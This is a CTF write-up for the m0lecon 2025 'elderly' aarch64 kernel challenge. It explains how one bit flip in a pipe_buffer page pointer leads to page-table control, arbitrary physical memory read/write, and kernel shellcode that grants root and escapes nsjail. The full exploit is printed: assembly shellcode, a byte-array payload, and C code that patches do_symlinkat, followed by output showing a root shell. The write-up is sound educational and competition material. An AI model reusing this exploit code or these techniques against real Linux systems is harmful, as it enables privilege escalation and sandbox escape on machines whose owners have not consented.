elderly - m0lecon CTF 2025 (Writeup)
I finally solved a chall I couldn’t crack during m0lecon CTF. It was an amazing journey of messing with page table entries, aarch64 shellcoding and escaping nsjail, all with a single bit flip.
Challenge overview
It’s a simple aarch64 Linux kernel module with the following interesting ioctl:
static long pwn_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    struct params p;
    int ret = -EINVAL;
    void *ptr = NULL;
    if (copy_from_user(&p, (void *)arg, sizeof(p)))
        return ret;
    if (!p.size || (p.size > 192))
        return ret;
    mutex_lock(&g_mutex);
    if (!done) {
        ptr = kmalloc(p.size, p.account ? GFP_KERNEL_ACCOUNT : GFP_KERNEL);
        if (!ptr)
            goto err;
        u64 page = (u64)ptr & ~0xfffUL;
        u64 pval = (u64)ptr + (p.idx / 8);
        if ((pval & ~0xfffUL) != page)
            goto err;
        change_bit(p.idx, ptr);
        done = 1;
    }
    ptr = NULL;
    ret = 0;
err:
    if (ptr)
        kfree(ptr);
    mutex_unlock(&g_mutex);
    return ret;
}
In short, we can ask the module for a heap allocation of at most 192 bytes, and
we also control the allocation flags (GFP_KERNEL or GFP_KERNEL_ACCOUNT). Then we
can flip one bit at any offset from our chunk, as long as it stays in the same
page: change_bit() is only checked against the page boundary, not against the
chunk size.
All of that works only once, in a single shot. A pretty weak primitive. Also,
our welcome shell runs inside nsjail.
Solution
My solution consists of getting arbitrary physical memory read/write by messing
with the page tables. With this, we can brute-force the kernel text base address
and write shellcode into a syscall handler that, when executed, escapes our task
from the sandbox and gives us root. To get arbitrary physical read/write, the
idea is to flip a bit in a victim pipe_buffer->page so that it points to another
valid page, which we free afterwards to get a sort of struct page use-after-free.
Then we spray page tables so that the page behind our victim pipe_buffer->page
gets reallocated as a level 2 page table. From there, we can overwrite page
table entries by writing to the victim pipe, and get arbitrary physical memory
read/write by writing a fake page table entry pointing to the physical address
we want.
Please find the full exploit here.
Here is a more detailed walkthrough:
- Gaining arbitrary physical memory read/write
- Spray some pipe_buffer arrays in the kmalloc-cg-192 cache. We can do that
simply by allocating pipes (i.e. calling pipe()). However, a default pipe
(internally pipe_inode_info) allocates 0x10 pipe buffers (code), so pipe->bufs
ends up in kmalloc-cg-1024 (0x10 * sizeof(struct pipe_buffer) = 640). To get the
pipe buffers into kmalloc-cg-192, we can use the F_SETPIPE_SZ fcntl to change
the number of internal buffers, reducing the size of pipe->bufs (code). The
exploit asks for 4 pages, which gives 4 pipe buffers, i.e. 4 * 40 = 160 bytes.
- Free one pipe out of every two, to make room for the chunk the module will allocate.
- Allocate a 160-byte chunk in kmalloc-cg-192 with the module ioctl
(GFP_KERNEL_ACCOUNT, so it shares the cache with pipe->bufs), and flip bit 6 of
the next chunk (idx = 192 * 8 + 6). Here, we hope that our chunk is adjacent to
a pipe_buffer array, so that the flip hits the page field of its first
pipe_buffer. Since struct page descriptors are stored in a contiguous array,
moving a struct page pointer by sizeof(struct page) still lands on a valid
struct page. Furthermore, sizeof(struct page) = 1 << 6, so flipping bit 6 moves
the pointer to the neighboring struct page. The goal is for the flipped page
pointer to land on the page of another sprayed pipe’s pipe_buffer. This way,
somewhere we end up with a victim pipe pointing to another pipe’s buffer.
- Look for the victim pipe: we simply read from all sprayed pipes and check
whether the value we read is the one we initialized the pipe with. If it
doesn’t match, this pipe’s buffer points to another pipe’s buffer: we
successfully flipped a pipe_buffer->page to another valid page.
- Free all pipes except the victim pipe. Now the victim pipe’s buffer is backed by a freed page.
- Spray page tables by writing to the mmap() regions in userspace (mapped at the
beginning of the exploit). Touching these pages triggers page faults (#PF),
which the kernel handles by allocating new page tables. If the spray worked, our
victim pipe buffer now points to a level 2 page table (page tables are
page-sized) full of page table entries. We can confirm this by writing a fake
page table entry into the victim pipe, pointing to physical address 0x40000000.
We then read back all mmap’ed regions: if one of them no longer holds the value
we wrote when initializing it, we know we overwrote its page table entry and its
address translation now points to physical address 0x40000000.
- Now that we have our victim pipe and our victim page (the mapped region that
points somewhere else), we can get arbitrary read/write: write a fake page table
entry for the physical address we want into the victim pipe buffer, then simply
read from or write to the victim page region (i.e. memcpy to or from the address
of the victim page, returned by mmap).
- Find the kernel base physical address by brute force: read the first 8 bytes of every page and check whether they match the first 8 bytes of the kernel .text.
- Write our shellcode at the address of do_symlinkat(), which is called when
creating a symlink and is reachable from within the sandbox. I stole this
technique here. I also stole the shellcode we’re writing and adapted it to aarch64. It does the following:
commit_creds(init_cred);
task = find_task_by_vpid(1);
switch_task_namespaces(task, init_nsproxy);
new_fs = copy_fs_struct(init_fs);
current_task = find_task_by_vpid(getpid());
current_task->fs = new_fs;
With this, we’re able to get root, get unrestricted namespaces and use the unsandboxed init_fs, which amounts to a full nsjail escape.
We can now execute the shellcode by creating a symlink and profit.
===============================================================
=============== The gets() of kernel pwn challs ===============
===============================================================
sh: can't access tty; job control turned off
~ $ /jail/exploit
[+] Victim pipe found: 19
[+] Found victim sprayed page: 0xdfa00000
[+] Looking for kernel physical base address...
[+] Kernel physical base: 0xb5010000
[+] pid: 2
[+] Writing shellcode
[+] Triggering
sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # cat /dev/vda
t ����S�-�
8�q��ۻ�B%Y1/tmp/flag_ڋ�ZP�,
-� t`
-�-�-�������� tktk��-�0-�-�-� -�A�������� �(2�(2�(2-�(������� tktk�.��tk
.
..
flag.txt
.�..ptm{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
Limitations
Unfortunately, the exploit is not reliable. The pipe spray is not very effective, for reasons I haven’t pinned down: it struggles to get a pipe_buffer array allocated right after the chunk allocated by the module. When that step succeeds, the rest is reliable, but this step is not. :(
Full exploit
.section .data
.set x30_kbase_offset, 0x34dd20
.set init_cred, 0x20222b8
.set commit_creds, 0xce5f8
.set find_task_by_vpid, 0xc5250
.set init_nsproxy, 0x2022088
.set switch_task_namespaces, 0xcbb6c
.set init_fs, 0x20a7938
.set copy_fs_struct, 0x384f54
.section .text
.global _start
_start:
/* backup ret address on the stack */
sub sp, sp, #0x8
str x30, [sp]
/* put kernel base in x27 based on the value in x30 */
mov x27, x30
movz x26, x30_kbase_offset & 0xffff
movk x26, x30_kbase_offset >> 16, lsl 16
subs x27, x27, x26
/* commit_creds(init_cred) */
mov x0, x27
movz x26, init_cred & 0xffff
movk x26, (init_cred) >> 16, lsl 16
add x0, x0, x26
mov x9, x27
movz x26, commit_creds & 0xffff
movk x26, (commit_creds) >> 16, lsl 16
add x9, x9, x26
blr x9
/* task = find_task_by_vpid(1) */
movz x0, 1
mov x9, x27
movz x26, find_task_by_vpid & 0xffff
movk x26, (find_task_by_vpid) >> 16, lsl 16
add x9, x9, x26
blr x9
/* switch_task_namespaces(task, init_nsproxy) */
mov x1, x27
movz x26, init_nsproxy & 0xffff
movk x26, (init_nsproxy) >> 16, lsl 16
add x1, x1, x26
mov x9, x27
movz x26, switch_task_namespaces & 0xffff
movk x26, (switch_task_namespaces) >> 16, lsl 16
add x9, x9, x26
blr x9
/* new_fs = copy_fs_struct(init_fs) */
mov x0, x27
movz x26, init_fs & 0xffff
movk x26, (init_fs) >> 16, lsl 16
add x0, x0, x26
mov x9, x27
movz x26, copy_fs_struct & 0xffff
movk x26, (copy_fs_struct) >> 16, lsl 16
add x9, x9, x26
blr x9
/* backup new_fs */
mov x25, x0
/* current = find_task_by_vpid(getpid()) */
mov x0, 0x4141 /* patched at runtime */
mov x9, x27
movz x26, find_task_by_vpid & 0xffff
movk x26, (find_task_by_vpid) >> 16, lsl 16
add x9, x9, x26
blr x9
/* current->fs = new_fs */
str x25, [x0, #0x6d8]
ldr x30, [sp]
add sp, sp, #0x8
ret
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sched.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#define SPRAY 20
#define PAGE_SPRAY 0x200
#define PAGE_SIZE 0x1000uLL
struct params {
    uint32_t size;
    uint32_t idx;
    bool account;
};
static int fds[SPRAY][2];
static void *page_spray[PAGE_SPRAY];
static int64_t pipe_victim_idx = -1;
static void *victim_page = 0uLL;
char shellcode[] = {
    0xff, 0x23, 0x0, 0xd1, 0xfe, 0x3, 0x0, 0xf9, 0xfb, 0x3, 0x1e, 0xaa,
    0x1a, 0xa4, 0x9b, 0xd2, 0x9a, 0x6, 0xa0, 0xf2, 0x7b, 0x3, 0x1a, 0xeb,
    0xe0, 0x3, 0x1b, 0xaa, 0x1a, 0x57, 0x84, 0xd2, 0x5a, 0x40, 0xa0, 0xf2,
    0x0, 0x0, 0x1a, 0x8b, 0xe9, 0x3, 0x1b, 0xaa, 0x1a, 0xbf, 0x9c, 0xd2,
    0x9a, 0x1, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b, 0x20, 0x1, 0x3f, 0xd6,
    0x20, 0x0, 0x80, 0xd2, 0xe9, 0x3, 0x1b, 0xaa, 0x1a, 0x4a, 0x8a, 0xd2,
    0x9a, 0x1, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b, 0x20, 0x1, 0x3f, 0xd6,
    0xe1, 0x3, 0x1b, 0xaa, 0x1a, 0x11, 0x84, 0xd2, 0x5a, 0x40, 0xa0, 0xf2,
    0x21, 0x0, 0x1a, 0x8b, 0xe9, 0x3, 0x1b, 0xaa, 0x9a, 0x6d, 0x97, 0xd2,
    0x9a, 0x1, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b, 0x20, 0x1, 0x3f, 0xd6,
    0xe0, 0x3, 0x1b, 0xaa, 0x1a, 0x27, 0x8f, 0xd2, 0x5a, 0x41, 0xa0, 0xf2,
    0x0, 0x0, 0x1a, 0x8b, 0xe9, 0x3, 0x1b, 0xaa, 0x9a, 0xea, 0x89, 0xd2,
    0x1a, 0x7, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b, 0x20, 0x1, 0x3f, 0xd6,
    0xf9, 0x3, 0x0, 0xaa, 0x20, 0x28, 0x88, 0xd2, 0xe9, 0x3, 0x1b, 0xaa,
    0x1a, 0x4a, 0x8a, 0xd2, 0x9a, 0x1, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b,
    0x20, 0x1, 0x3f, 0xd6, 0x19, 0x6c, 0x3, 0xf9, 0xfe, 0x3, 0x40, 0xf9,
    0xff, 0x23, 0x0, 0x91, 0xc0, 0x3, 0x5f, 0xd6,
};
// taken from
// https://github.com/google/google-ctf/blob/master/2023/pwn-kconcat/solution/exp.c
void hexdump(char *buf, int size) {
    for (int i = 0; i < size; i++) {
        if (i % 16 == 0)
            printf("%04x: ", i);
        // cast so bytes >= 0x80 print as two hex digits, not sign-extended
        printf("%02x ", (unsigned char)buf[i]);
        if (i % 16 == 15)
            printf("\n");
    }
    if (size % 16 != 0)
        printf("\n");
}
void win(void) { system("sh"); }
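void encode_mov(uint16_t value, char *output) {
    // MOVZ X0, #value: 0xd2800000 | (imm16 << 5), Rd = x0.
    // Unsigned arithmetic: 0xd28 << 20 does not fit in a signed int.
    uint32_t opcode = (0xd28u << 20) | ((uint32_t)value << 5);
    for (int i = 0; i < 4; i++) {
        output[i] = (opcode >> (i * 8)) & 0xff; // little-endian byte order
    }
}
void patch_shellcode(uint16_t to_patch_val, uint16_t val) {
    void *p;
    char value[4];
    char to_patch[4];
    encode_mov(val, value);
    encode_mov(to_patch_val, to_patch);
    // locate the placeholder "mov x0, #to_patch_val" and replace its immediate
    p = memmem(shellcode, sizeof(shellcode), to_patch, 4);
    if (!p) {
        // memmem() does not set errno, so perror() would print a stale error
        fprintf(stderr, "memmem(): placeholder not found in shellcode\n");
        exit(EXIT_FAILURE);
    }
    memcpy(p, value, 4);
}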
void spray_pipe() {
    int ret;
    char tmp[PAGE_SIZE];
    for (uint8_t i = 0; i < SPRAY; i++) {
        if (pipe(fds[i]) < 0) {
            perror("pipe()");
            exit(EXIT_FAILURE);
        }
        ret = fcntl(fds[i][0], F_SETPIPE_SZ, PAGE_SIZE * 4);
        if (ret < 0) {
            perror("fcntl()");
            exit(EXIT_FAILURE);
        }
        memset(&tmp, 0x41 + i, sizeof(tmp));
        if (write(fds[i][1], &tmp, sizeof(tmp)) < 0) {
            perror("write()");
            exit(EXIT_FAILURE);
        }
    }
}
static int *alloc_pipe_buf(int *fds) {
    int ret;
    char tmp[PAGE_SIZE];
    if (pipe(fds) < 0) {
        perror("pipe()");
        exit(EXIT_FAILURE);
    }
    ret = fcntl(fds[0], F_SETPIPE_SZ, PAGE_SIZE * 4);
    if (ret < 0) {
        perror("fcntl()");
        exit(EXIT_FAILURE);
    }
    // write a full page
    memset(&tmp, 0x41, sizeof(tmp));
    if (write(fds[1], &tmp, sizeof(tmp)) < 0) {
        perror("write()");
        exit(EXIT_FAILURE);
    }
    return fds;
}
static void free_pipe_buf(int *fds) {
    close(fds[1]);
    close(fds[0]);
}
void spray_page_tables() {
    for (int i = 0; i < PAGE_SPRAY; i++)
        for (int j = 0; j < 8; j++)
            *(uint8_t *)(page_spray[i] + j * PAGE_SIZE) = 0x61 + j;
}
// Finds the page whose page table was modified to point to target
// physical memory.
void *find_sprayed_page() {
    char page[PAGE_SIZE];
    // drain pipe
    if (read(fds[pipe_victim_idx][0], page, PAGE_SIZE) < 0) {
        perror("read()");
        exit(EXIT_FAILURE);
    }
    // write a dummy pte to 0x0000000040000000, which is always valid
    uint64_t new_pte = 0x0000000040000000 | (0xe8ULL << 48);
    new_pte |= (0xf43LL);
    if (write(fds[pipe_victim_idx][1], &new_pte, sizeof(new_pte)) < 0) {
        perror("write()");
        exit(EXIT_FAILURE);
    }
    for (int i = 0; i < PAGE_SPRAY; i++) {
        for (int j = 0; j < 8; j++) {
            uint8_t *victim = page_spray[i] + j * PAGE_SIZE;
            if (*victim != (0x61 + j)) {
                // restore pipe_buffer offset
                if (read(fds[pipe_victim_idx][0], page, sizeof(new_pte)) < 0) {
                    perror("read()");
                    exit(EXIT_FAILURE);
                }
                return victim;
            }
        }
    }
    return NULL;
}
// Returns the virtual address where we wrote.
void *phys_write(uint64_t dst_phys_addr, void *buf, size_t len) {
    char tmp[8];
    uint64_t dst_aligned_down = dst_phys_addr & ~(PAGE_SIZE - 1);
    uint64_t offset = dst_phys_addr & (PAGE_SIZE - 1);
    void *vaddr;
    uint64_t new_pte = dst_aligned_down | (0xe8ULL << 48);
    new_pte |= (0xf43LL);
    if (write(fds[pipe_victim_idx][1], &new_pte, sizeof(new_pte)) < 0) {
        perror("write()");
        exit(EXIT_FAILURE);
    }
    vaddr = victim_page + offset;
    memcpy(vaddr, buf, len);
    // reset pipe buffer offset after write
    if (read(fds[pipe_victim_idx][0], &tmp, sizeof(tmp)) < 0) {
        perror("read()");
        exit(EXIT_FAILURE);
    }
    return vaddr;
}
void phys_read(uint64_t dst_phys_addr, void *buf, size_t len) {
    char tmp[8];
    uint64_t dst_aligned_down = dst_phys_addr & ~(PAGE_SIZE - 1);
    uint64_t offset = dst_phys_addr & (PAGE_SIZE - 1);
    void *vaddr;
    uint64_t new_pte = dst_aligned_down | (0xe8ULL << 48);
    new_pte |= (0xf43LL);
    if (write(fds[pipe_victim_idx][1], &new_pte, sizeof(new_pte)) < 0) {
        perror("write()");
        exit(EXIT_FAILURE);
    }
    vaddr = victim_page + offset;
    memcpy(buf, vaddr, len);
    // reset pipe buffer offset after write
    if (read(fds[pipe_victim_idx][0], &tmp, sizeof(tmp)) < 0) {
        perror("read()");
        exit(EXIT_FAILURE);
    }
}
static const uint64_t kernel_text_magic = 0xd503245ff3576a22;
static uint64_t kernel_phys_base = 0uLL;
uint64_t find_kernel_phys_base() {
    uint64_t start = 0x0000000040000000;
    for (int i = 0; i < 0x1000000; i++) {
        uint64_t v = 0;
        uint64_t paddr = start + (PAGE_SIZE)*i;
        phys_read(paddr, &v, sizeof(v));
        if (v == kernel_text_magic) {
            return paddr;
        }
    }
    return 0;
}
void bind_core(int core) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}
int main(void) {
    int fd, ret;
    char tmp[0x60];
    char page[PAGE_SIZE];
    bind_core(0);
    for (int i = 0; i < PAGE_SPRAY; i++) {
        page_spray[i] =
            mmap((void *)(0xdead0000UL + i * 0x10000UL), 0x8000,
                 PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
        if (page_spray[i] == MAP_FAILED) {
            perror("mmap()");
            exit(EXIT_FAILURE);
        }
    }
    fd = open("/dev/pwn", O_RDWR);
    if (fd < 0) { // open() returns -1 on failure, not 0
        perror("open()");
        exit(EXIT_FAILURE);
    }
    spray_pipe();
    for (int i = 0; i < SPRAY; i += 2) {
        free_pipe_buf(fds[i]);
    }
    // Allocate the victim chunk in kmalloc-cg-192.
    // We flip bit 6 of the first field (struct page *page) of the adjacent
    // pipe_buffer so it points to a neighboring struct page
    // (sizeof(struct page) = 0x40).
    struct params a = {
        .size = 160,
        .idx = ((192 * 1) * 8 + 6), // adjacent chunk
        .account = true,
    };
    ret = ioctl(fd, 0, &a);
    if (ret < 0) {
        perror("ioctl()");
        exit(EXIT_FAILURE);
    }
    for (int i = 1; i < SPRAY; i += 2) {
        uint8_t c;
        uint8_t dummy[7];
        ret = read(fds[i][0], &c, sizeof(c));
        if (ret < 0) {
            perror("read()");
            exit(EXIT_FAILURE);
        }
        // dummy read to align the pipe buffer
        if (read(fds[i][0], &dummy, sizeof(dummy)) < 0) {
            perror("read()");
            exit(EXIT_FAILURE);
        }
        if (c != (0x41 + i)) {
            pipe_victim_idx = i;
            printf("[+] Victim pipe found: %d\n", i);
            break;
        }
    }
    if (pipe_victim_idx < 0) {
        puts("[!] No victim found");
        exit(EXIT_FAILURE);
    }
    for (int i = 1; i < SPRAY; i += 2) {
        if (i == pipe_victim_idx)
            continue;
        free_pipe_buf(fds[i]);
    }
    spray_page_tables();
    victim_page = find_sprayed_page();
    if (!victim_page) {
        puts("[!] Can't find the page with a modified PTE");
        exit(EXIT_FAILURE);
    }
    printf("[+] Found victim sprayed page: %p\n", victim_page);
    puts("[+] Looking for kernel physical base address...");
    kernel_phys_base = find_kernel_phys_base();
    if (!kernel_phys_base) {
        puts("[!] Failed to find kernel physical base");
        exit(EXIT_FAILURE);
    }
    printf("[+] Kernel physical base: 0x%lx\n", kernel_phys_base);
    int pid = getpid();
    printf("[+] pid: %d\n", pid);
    patch_shellcode(0x4141, pid);
    puts("[+] Writing shellcode");
    uint64_t do_symlink_at_offset = 0x34da30UL;
    phys_write(kernel_phys_base + do_symlink_at_offset, (void *)shellcode,
               sizeof(shellcode));
    puts("[+] Triggering");
    int cwd = open("/", O_DIRECTORY);
    symlinkat("/jail/exploit", cwd, "/jail");
    win();
    close(cwd);
    sleep(1000000);
    close(fd);
    return 0;
}